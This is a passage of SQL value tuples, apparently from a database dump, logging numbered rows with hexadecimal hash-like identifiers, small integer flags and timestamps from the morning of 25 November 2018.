(32312, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 08:57:40'),
(32313, '873442a4837c56326ea73aaa7ca90236', 'bef82449f874d632', 0, 2, 1, '2018-11-25 08:58:07'),
(32314, 'b4f26628fd164a4f95537fa8689fb5ec', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-11-25 08:58:13'),
(32315, 'e6408c76d69d90fa217c82ac71930139', 'b2e78912dacced42', 0, 2, 1, '2018-11-25 08:58:13'),
(32316, 'e6408c76d69d90fa217c82ac71930139', 'b2e78912dacced42', 0, 2, 1, '2018-11-25 08:58:35'),
(32317, 'b4f26628fd164a4f95537fa8689fb5ec', '1f2a82cd68d8bbd5', 0, 2, 1, '2018-11-25 08:58:53'),
(32318, '873442a4837c56326ea73aaa7ca90236', 'bef82449f874d632', 0, 2, 1, '2018-11-25 08:59:12'),
(32319, '873442a4837c56326ea73aaa7ca90236', 'bef82449f874d632', 0, 2, 1, '2018-11-25 08:59:33'),
(32320, '873442a4837c56326ea73aaa7ca90236', 'bef82449f874d632', 0, 2, 1, '2018-11-25 08:59:54'),
(32321, 'f70a0fae63cec0bd6d49b77aafda55b3', '296d9de09b136627', 0, 2, 1, '2018-11-25 09:00:32'),
(32322, '458880ee382f79efa9fb3ceee49aeb4b', '39bd0a38d8592740', 0, 2, 1, '2018-11-25 09:01:09'),
(32323, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 09:01:36'),
(32324, '10ea9cf63f37a997c873c5dd3acdfd8a', '5c88095d7f308e7d', 0, 2, 1, '2018-11-25 09:01:40'),
(32325, '60fe79c160b1bd1e423f2b0874f34847', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 09:01:55'),
(32326, '10ea9cf63f37a997c873c5dd3acdfd8a', '5c88095d7f308e7d', 0, 2, 1, '2018-11-25 09:02:00'),
(32327, 'b786e2277e8829d53c40e7d68f2fb015', '0d5265473f60cc71', 0, 2, 1, '2018-11-25 09:02:03'),
(32328, '10ea9cf63f37a997c873c5dd3acdfd8a', '5c88095d7f308e7d', 0, 2, 1, '2018-11-25 09:02:10'),
(32329, 'bb06ca3e93e8a463f6128277d5d063fe', 'c8e692bf76d23583', 0, 2, 1, '2018-11-25 09:02:13'),
(32330, 'bb06ca3e93e8a463f6128277d5d063fe', 'c8e692bf76d23583', 0, 2, 1, '2018-11-25 09:02:20'),
(32331, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 09:02:31'),
(32332, '58d43130e4fe4413d1b7a89b427abafe', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 09:03:08'),
(32333, '67c3cd6d6b324db1eb03373f863266a8', '944817f133330d52', 0, 2, 1, '2018-11-25 09:03:44'),
(32334, 'ddef7f80e14f88982231fb3e7d8c46a7', '4d97774f109e62cc', 0, 2, 1, '2018-11-25 09:03:48'),
(32335, '598cab65f8df9c81d344fdce41dee293', '0b83b588375e9508', 0, 2, 1, '2018-11-25 09:04:10'),
(32336, '5bcf4c8c0f0b4c9950ca7ce0facafb96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-25 09:04:20'),
(32337, 'ddef7f80e14f88982231fb3e7d8c46a7', '4d97774f109e62cc', 0, 2, 1, '2018-11-25 09:04:30'),
(32338, '62b51775b0470dc5628b8fafc743542a', '411809a73756d39c', 0, 2, 1, '2018-11-25 09:04:41'),
(32339, '244d0e04b1c060f0e469d7d97bf416f1', 'af9c482b1393fda6', 0, 2, 1, '2018-11-25 09:05:22'),
(32340, '5bcf4c8c0f0b4c9950ca7ce0facafb96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-25 09:05:41'),
(32341, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 09:05:56'),
(32342, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:05:56'),
(32343, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 09:06:10'),
(32344, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 09:06:27'),
(32345, 'dbe8e72ba366444c6905cd089d41df9c', '3f602491b350372f', 0, 2, 1, '2018-11-25 09:06:40'),
(32346, 'af2b794682cd8f1b4b6f79de32a47c04', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-25 09:09:34'),
(32347, '607810d75c344a39b761e97479f280f9', '5ff50e247bff9b98', 0, 2, 1, '2018-11-25 09:09:36'),
(32348, '607810d75c344a39b761e97479f280f9', '5ff50e247bff9b98', 0, 2, 1, '2018-11-25 09:10:20'),
(32349, '39c15d34d72225221f32a95c69710f05', 'c98a517fb6191f41', 0, 2, 1, '2018-11-25 09:11:26'),
(32350, '5bcf4c8c0f0b4c9950ca7ce0facafb96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-25 09:11:29'),
(32351, '32f663a17ffa5d34b3f94e0eee490a9e', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-25 09:11:36'),
(32352, '39c15d34d72225221f32a95c69710f05', 'c98a517fb6191f41', 0, 2, 1, '2018-11-25 09:12:41'),
(32353, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:12:51'),
(32354, '0248b99dce48d21fd0a30047abe85514', '4c07673592205f17', 0, 2, 1, '2018-11-25 09:13:16'),
(32355, '62b51775b0470dc5628b8fafc743542a', '411809a73756d39c', 0, 2, 1, '2018-11-25 09:14:35'),
(32356, 'ddef7f80e14f88982231fb3e7d8c46a7', '4d97774f109e62cc', 0, 2, 1, '2018-11-25 09:14:36'),
(32357, '73003354702bf5448580d4899f3672b5', 'c645109b5ec2f2bb', 0, 2, 1, '2018-11-25 09:14:53'),
(32358, 'ddef7f80e14f88982231fb3e7d8c46a7', '4d97774f109e62cc', 0, 2, 1, '2018-11-25 09:15:08'),
(32359, 'a84116674efc841a0f359d75eb60c3a7', '407f5dc75c6f4a5d', 0, 2, 1, '2018-11-25 09:15:55'),
(32360, 'd982b111f7bc52d8cf23a8cfe8577544', 'f538f3264afd5dbb', 0, 2, 1, '2018-11-25 09:16:35'),
(32361, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:16:39'),
(32362, 'd3f05177ca07fca000272e23d942e004', '3aff1aead3b37374', 0, 2, 1, '2018-11-25 09:16:43'),
(32363, '198416497ee68f081c4b66fe30a91b83', '91d3688e197526d0', 0, 2, 1, '2018-11-25 09:16:51'),
(32364, 'b78029a318c5d03cf538ba98e6193281', 'd1700b6763a4f4f1', 0, 2, 1, '2018-11-25 09:17:22'),
(32365, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 09:18:10'),
(32366, 'b7f67021c8b156a966b5a6c13495f846', 'e04aa6f074175862', 0, 2, 1, '2018-11-25 09:18:22'),
(32367, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 09:19:08'),
(32368, 'e5b0175aefd750ed03cf834efa6654f5', '6537a8a3624775b8', 0, 2, 1, '2018-11-25 09:19:16'),
(32369, 'a84116674efc841a0f359d75eb60c3a7', '407f5dc75c6f4a5d', 0, 2, 1, '2018-11-25 09:19:21'),
(32370, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 09:19:25'),
(32371, 'e5b0175aefd750ed03cf834efa6654f5', '6537a8a3624775b8', 0, 2, 1, '2018-11-25 09:19:29'),
(32372, '9b789bbb50e49168e4f89c3a95aca1c7', 'd75cd09a17762df0', 0, 2, 1, '2018-11-25 09:19:37'),
(32373, 'a84116674efc841a0f359d75eb60c3a7', '407f5dc75c6f4a5d', 0, 2, 1, '2018-11-25 09:19:51'),
(32374, '2e37178df5c4dca83d7b1e19adbde197', '30f2212981adef2f', 0, 2, 1, '2018-11-25 09:20:31'),
(32375, 'a84116674efc841a0f359d75eb60c3a7', '407f5dc75c6f4a5d', 0, 2, 1, '2018-11-25 09:20:31'),
(32376, '2e37178df5c4dca83d7b1e19adbde197', '30f2212981adef2f', 0, 2, 1, '2018-11-25 09:20:38'),
(32377, '1918aa0d286fc688cfc766911a19de57', '2034f09284a4c7ca', 0, 2, 1, '2018-11-25 09:21:53'),
(32378, '9296212ae2b46ea4f34c9982e3c3a494', '3a87154f20d3fafa', 0, 2, 1, '2018-11-25 09:22:37'),
(32379, '54e6f5ef533ce01d0bfe56ef6cf4912f', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 09:22:38'),
(32380, 'dda5ff7659b62a889e2b3cc1e7359ae4', 'c350f1edbeca986c', 0, 2, 1, '2018-11-25 09:22:50'),
(32381, 'a565aa3c2e208b700bef2fa3592061f1', '94526f1094c8a3e4', 0, 2, 1, '2018-11-25 09:23:10'),
(32382, 'e5b0175aefd750ed03cf834efa6654f5', '6537a8a3624775b8', 0, 2, 1, '2018-11-25 09:23:27'),
(32383, '08b66f9d25bb399ce21e6433098adebe', '9c8e3961bb9c911b', 0, 2, 1, '2018-11-25 09:23:29'),
(32384, 'e716757d6ac1ad561a72fca714a1aa09', '9a903552e28cf43c', 0, 2, 1, '2018-11-25 09:23:33'),
(32385, 'e716757d6ac1ad561a72fca714a1aa09', '9a903552e28cf43c', 0, 2, 1, '2018-11-25 09:23:53'),
(32386, 'dda5ff7659b62a889e2b3cc1e7359ae4', 'c350f1edbeca986c', 0, 2, 1, '2018-11-25 09:24:03'),
(32387, '1c0bb9cc2d20e735732e707b39cba636', '2b9f3816f683545a', 0, 2, 1, '2018-11-25 09:24:07'),
(32388, '9b789bbb50e49168e4f89c3a95aca1c7', 'd75cd09a17762df0', 0, 2, 1, '2018-11-25 09:24:08'),
(32389, '70a06aab2cc71d80a394c7fb63643aa7', '220b6bed49713ca3', 0, 2, 1, '2018-11-25 09:24:13'),
(32390, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 09:25:00'),
(32391, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 09:25:14'),
(32392, '32d42072afd0cb915d52019ba95eba50', '54b1e354d5b62a47', 0, 2, 1, '2018-11-25 09:25:28'),
(32393, '9296212ae2b46ea4f34c9982e3c3a494', '3a87154f20d3fafa', 0, 2, 1, '2018-11-25 09:25:51'),
(32394, '08b66f9d25bb399ce21e6433098adebe', '9c8e3961bb9c911b', 0, 2, 1, '2018-11-25 09:26:03'),
(32395, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 09:26:21'),
(32396, '1fa2af63918bd8ac63ec1001df502ffc', '8f501a4d6c1cce05', 0, 2, 1, '2018-11-25 09:26:23'),
(32397, '32d42072afd0cb915d52019ba95eba50', '54b1e354d5b62a47', 0, 2, 1, '2018-11-25 09:26:56'),
(32398, 'a565aa3c2e208b700bef2fa3592061f1', '94526f1094c8a3e4', 0, 2, 1, '2018-11-25 09:26:57'),
(32399, '316e16e89a7255d4649d5ba7f24db658', '744a9fbb2ebf3b62', 0, 2, 1, '2018-11-25 09:27:15'),
(32400, '746e5a5decd9ec265e29b7e14635f0d8', '9e54679b144bbbf5', 0, 2, 1, '2018-11-25 09:27:29'),
(32401, '1bec65e43d7b11a6bd374790edf4f794', '5e0791672ffb8a10', 0, 2, 1, '2018-11-25 09:27:34'),
(32402, '08b66f9d25bb399ce21e6433098adebe', '9c8e3961bb9c911b', 0, 2, 1, '2018-11-25 09:27:53'),
(32403, '58ec97f55192bc070f1dd35b7e4f0a35', '4d0aeac5200fe301', 0, 2, 1, '2018-11-25 09:28:06'),
(32404, '1bec65e43d7b11a6bd374790edf4f794', '5e0791672ffb8a10', 0, 2, 1, '2018-11-25 09:28:14'),
(32405, '316e16e89a7255d4649d5ba7f24db658', '744a9fbb2ebf3b62', 0, 2, 1, '2018-11-25 09:28:25'),
(32406, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 09:28:46'),
(32407, 'b7f67021c8b156a966b5a6c13495f846', 'e04aa6f074175862', 0, 2, 1, '2018-11-25 09:30:15'),
(32408, 'b7f67021c8b156a966b5a6c13495f846', 'e04aa6f074175862', 0, 2, 1, '2018-11-25 09:30:24'),
(32409, '58ec97f55192bc070f1dd35b7e4f0a35', '4d0aeac5200fe301', 0, 2, 1, '2018-11-25 09:32:02'),
(32410, 'cd6b3e40d0bf22a681a437b2823e5c95', '5b3051f95f43261f', 0, 2, 1, '2018-11-25 09:32:41'),
(32411, 'a7f4edcc60c981326479b6ad2c8f39c0', 'eefe72222194052a', 0, 2, 1, '2018-11-25 09:33:16'),
(32412, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:33:26'),
(32413, 'a7f4edcc60c981326479b6ad2c8f39c0', 'eefe72222194052a', 0, 2, 1, '2018-11-25 09:33:34'),
(32414, 'cd6b3e40d0bf22a681a437b2823e5c95', '5b3051f95f43261f', 0, 2, 1, '2018-11-25 09:34:13'),
(32415, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:34:50'),
(32416, '2913d0490bbfbf0a1c6e1bcdff968d8b', '433577cdf4c8f98a', 0, 2, 1, '2018-11-25 09:35:43'),
(32417, '2913d0490bbfbf0a1c6e1bcdff968d8b', '433577cdf4c8f98a', 0, 2, 1, '2018-11-25 09:36:09'),
(32418, '7de72b09f2598d5f0e6d619b8282f0c9', '66cd2ffd1b716f5a', 0, 2, 1, '2018-11-25 09:36:51'),
(32419, 'f09d7bcf677e7919083f9dde1f4ecc95', '15d841d3822d459c', 0, 2, 1, '2018-11-25 09:37:10'),
(32420, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 09:37:54'),
(32421, '2913d0490bbfbf0a1c6e1bcdff968d8b', '433577cdf4c8f98a', 0, 2, 1, '2018-11-25 09:38:46'),
(32422, 'c72aba05000f15dbb8c46d265df18387', '1c7a3046aba6e358', 0, 2, 1, '2018-11-25 09:38:58'),
(32423, '67b72fda9c1dddae6b0ccca72b938718', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 09:39:01'),
(32424, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 09:39:04'),
(32425, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 09:39:09'),
(32426, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 09:40:14'),
(32427, '2079abf99bb09e8818114bf9d35aa315', '03656dd438efd1a5', 0, 2, 1, '2018-11-25 09:40:56'),
(32428, '15a1d519510bb2ac2c28656e52c546b4', 'b3bf3468e0c56f69', 0, 2, 1, '2018-11-25 09:42:03'),
(32429, '35288df5eb9debd27c91e8125148d920', 'beebdfd637cefeb2', 0, 2, 1, '2018-11-25 09:42:06'),
(32430, '35288df5eb9debd27c91e8125148d920', 'beebdfd637cefeb2', 0, 2, 1, '2018-11-25 09:42:17'),
(32431, '1d3125cc411976f885d186092acaba1c', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-25 09:43:08'),
(32432, '0fad81144bf1d2c43a723cb91914b995', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 09:43:32'),
(32433, '0fad81144bf1d2c43a723cb91914b995', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-25 09:43:44'),
(32434, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-25 09:44:46'),
(32435, '67659a6f9e175d4ad1e1c6ffe92a92d0', '0e0839ca9932578a', 0, 2, 1, '2018-11-25 09:45:52'),
(32436, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 09:46:12'),
(32437, 'a7f4edcc60c981326479b6ad2c8f39c0', 'eefe72222194052a', 0, 2, 1, '2018-11-25 09:46:23'),
(32438, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 09:46:36'),
(32439, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 09:47:09'),
(32440, 'c11fa2f31c55e3cb386034c2a5533408', '7501b42c35accff7', 0, 2, 1, '2018-11-25 09:47:39'),
(32441, '15a1d519510bb2ac2c28656e52c546b4', 'b3bf3468e0c56f69', 0, 2, 1, '2018-11-25 09:48:03'),
(32442, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 09:48:03'),
(32443, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 09:48:31'),
(32444, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 09:48:49'),
(32445, '2abce443dda1e175287f91ab1c9f154b', 'dee0189c9a93ff94', 0, 2, 1, '2018-11-25 09:49:56'),
(32446, '66a5b365ae6ea50a5f4cda3f2dccc8eb', '746961cbf388ef6a', 0, 2, 1, '2018-11-25 09:50:02'),
(32447, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 09:55:14'),
(32448, 'c533c2f42135c6c3e902ef335a9bd7ef', '1b466b565be60765', 0, 2, 1, '2018-11-25 09:57:55'),
(32449, '52bc5ee596145c26979debb3aa594d7f', '29bca5b1af4f141c', 0, 2, 1, '2018-11-25 09:59:09'),
(32450, '1d3125cc411976f885d186092acaba1c', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-25 09:59:40'),
(32451, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:00:04'),
(32452, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:01:22'),
(32453, '7c8eb5aa9fd1825ea8c50e138aad7427', '4df5ced8675ad994', 0, 2, 1, '2018-11-25 10:01:31'),
(32454, '8708fdbcc8ec2510f3a1e4ef735a3243', '14cb28e263fc2409', 0, 2, 1, '2018-11-25 10:02:26'),
(32455, '53163fde8d09dfdd73a2593d7394dd51', 'b335903010e84d54', 0, 2, 1, '2018-11-25 10:02:49'),
(32456, '15a1d519510bb2ac2c28656e52c546b4', 'b3bf3468e0c56f69', 0, 2, 1, '2018-11-25 10:03:00'),
(32457, '53163fde8d09dfdd73a2593d7394dd51', 'b335903010e84d54', 0, 2, 1, '2018-11-25 10:03:04'),
(32458, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:03:35'),
(32459, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:05:45'),
(32460, 'ffc7d5cc8bc954745e110b5418cea1e9', '4ae78db741bab2b5', 0, 2, 1, '2018-11-25 10:05:56'),
(32461, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 10:05:59'),
(32462, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:06:01'),
(32463, 'ffc7d5cc8bc954745e110b5418cea1e9', '4ae78db741bab2b5', 0, 2, 1, '2018-11-25 10:06:41'),
(32464, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:07:36'),
(32465, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:08:23'),
(32466, 'e716757d6ac1ad561a72fca714a1aa09', '9a903552e28cf43c', 0, 2, 1, '2018-11-25 10:08:30'),
(32467, 'b10f03455f3007a1369265a2ee120fd6', 'f27681df79b531e4', 0, 2, 1, '2018-11-25 10:09:00'),
(32468, 'b10f03455f3007a1369265a2ee120fd6', 'f27681df79b531e4', 0, 2, 1, '2018-11-25 10:09:26'),
(32469, '5ca21d365f1f20b03fd2c5310d0fcb8a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-25 10:09:42'),
(32470, '5ca21d365f1f20b03fd2c5310d0fcb8a', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-25 10:09:55'),
(32471, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:10:09'),
(32472, '320ff0dcf14125692c05e64f01648ee9', 'c40cb1cc5eb13bc9', 0, 2, 1, '2018-11-25 10:10:28'),
(32473, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:11:23'),
(32474, '320ff0dcf14125692c05e64f01648ee9', 'c40cb1cc5eb13bc9', 0, 2, 1, '2018-11-25 10:11:52'),
(32475, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:12:06'),
(32476, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 10:12:35'),
(32477, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:12:55'),
(32478, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:15:09'),
(32479, '32fdbe74a101d55a7bf951d0027b860b', 'b30e2d45addac66f', 0, 2, 1, '2018-11-25 10:15:12'),
(32480, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:15:50'),
(32481, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:16:14'),
(32482, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:16:40'),
(32483, 'f08fed75543d2c1844edb739dca37047', '07ad0a6b8606cdf8', 0, 2, 1, '2018-11-25 10:16:43'),
(32484, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:16:47'),
(32485, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:16:56'),
(32486, 'f0953da7d0e77a8a563065c4270a15a4', '721a08095e6444d9', 0, 2, 1, '2018-11-25 10:17:09'),
(32487, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 10:17:19'),
(32488, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:17:20'),
(32489, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:17:23'),
(32490, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 10:17:34'),
(32491, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:17:35'),
(32492, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 10:17:47'),
(32493, 'b559f88b1d639ae95d94e0b5466540f5', 'f2be47c7b5e54850', 0, 2, 1, '2018-11-25 10:18:10'),
(32494, 'b559f88b1d639ae95d94e0b5466540f5', 'f2be47c7b5e54850', 0, 2, 1, '2018-11-25 10:18:23'),
(32495, '92527c91923c65611d6c73e5cbe7ac74', '1ec75219d7482e28', 0, 2, 1, '2018-11-25 10:18:41'),
(32496, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 10:18:45'),
(32497, 'e38d7d7d81b1a0343acaaeb00cc901e4', '5b896f015eca7478', 0, 2, 1, '2018-11-25 10:18:59'),
(32498, '92527c91923c65611d6c73e5cbe7ac74', '1ec75219d7482e28', 0, 2, 1, '2018-11-25 10:19:14'),
(32499, 'e38d7d7d81b1a0343acaaeb00cc901e4', '5b896f015eca7478', 0, 2, 1, '2018-11-25 10:19:27'),
(32500, '92527c91923c65611d6c73e5cbe7ac74', '1ec75219d7482e28', 0, 2, 1, '2018-11-25 10:19:32'),
(32501, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:19:36'),
(32502, 'e38d7d7d81b1a0343acaaeb00cc901e4', '5b896f015eca7478', 0, 2, 1, '2018-11-25 10:20:08'),
(32503, '718374c4de89ed6958462263c092ab5a', '0d9bc97f0126cfb2', 0, 2, 1, '2018-11-25 10:20:22'),
(32504, 'e38d7d7d81b1a0343acaaeb00cc901e4', '5b896f015eca7478', 0, 2, 1, '2018-11-25 10:20:32'),
(32505, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:21:02'),
(32506, 'c50a0a72f2825ebad316e27b1837dcc3', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:21:24'),
(32507, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:21:57'),
(32508, '718374c4de89ed6958462263c092ab5a', '0d9bc97f0126cfb2', 0, 2, 1, '2018-11-25 10:22:04'),
(32509, '8ab1d56ad4f2a3b0a4e6989061d01b11', '9113ca554f25f876', 0, 2, 1, '2018-11-25 10:22:10'),
(32510, 'b559f88b1d639ae95d94e0b5466540f5', 'f2be47c7b5e54850', 0, 2, 1, '2018-11-25 10:22:34'),
(32511, '8ab1d56ad4f2a3b0a4e6989061d01b11', '9113ca554f25f876', 0, 2, 1, '2018-11-25 10:22:41'),
(32512, '3b2bed027b772138e74d776a429d5ed3', '20eeb18cbb98ed18', 0, 2, 1, '2018-11-25 10:23:34'),
(32513, '8ab1d56ad4f2a3b0a4e6989061d01b11', '9113ca554f25f876', 0, 2, 1, '2018-11-25 10:23:43'),
(32514, '3b2bed027b772138e74d776a429d5ed3', '20eeb18cbb98ed18', 0, 2, 1, '2018-11-25 10:23:44'),
(32515, '718374c4de89ed6958462263c092ab5a', '0d9bc97f0126cfb2', 0, 2, 1, '2018-11-25 10:24:09'),
(32516, 'e748b77fc39ed1ccfce3a77da25b3f47', '017fb60ad4c37e3d', 0, 2, 1, '2018-11-25 10:24:16'),
(32517, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:24:18'),
(32518, '32fdbe74a101d55a7bf951d0027b860b', 'b30e2d45addac66f', 0, 2, 1, '2018-11-25 10:24:35'),
(32519, '76ae28847c6217e530482d5c0d1f2b66', '679c2311f97bf8cf', 0, 2, 1, '2018-11-25 10:25:47'),
(32520, '2079abf99bb09e8818114bf9d35aa315', '03656dd438efd1a5', 0, 2, 1, '2018-11-25 10:25:50'),
(32521, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 10:25:58'),
(32522, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 10:26:07'),
(32523, '76ae28847c6217e530482d5c0d1f2b66', '679c2311f97bf8cf', 0, 2, 1, '2018-11-25 10:27:04'),
(32524, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 10:27:34'),
(32525, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:28:32'),
(32526, '54e6f5ef533ce01d0bfe56ef6cf4912f', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 10:28:52'),
(32527, '9c8be5fdf5406b166a5c450927e0d5d7', 'b50d65df97c0251e', 0, 2, 1, '2018-11-25 10:29:13'),
(32528, 'e716757d6ac1ad561a72fca714a1aa09', '9a903552e28cf43c', 0, 2, 1, '2018-11-25 10:30:18'),
(32529, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:30:35'),
(32530, '051868f6c1403b614c50e7c36b0ae788', '0678e618450e11c6', 0, 2, 1, '2018-11-25 10:30:37'),
(32531, 'f5906c6f336a33ab6578bd282c875404', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:34:07'),
(32532, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:35:16'),
(32533, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:35:21'),
(32534, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 10:35:52'),
(32535, '7c89fae6a8bd87473a547c3702150a4d', '0d9bc97f0126cfb2', 0, 2, 1, '2018-11-25 10:37:42'),
(32536, '7c89fae6a8bd87473a547c3702150a4d', '0d9bc97f0126cfb2', 0, 2, 1, '2018-11-25 10:38:02'),
(32537, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:38:07'),
(32538, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 10:38:16'),
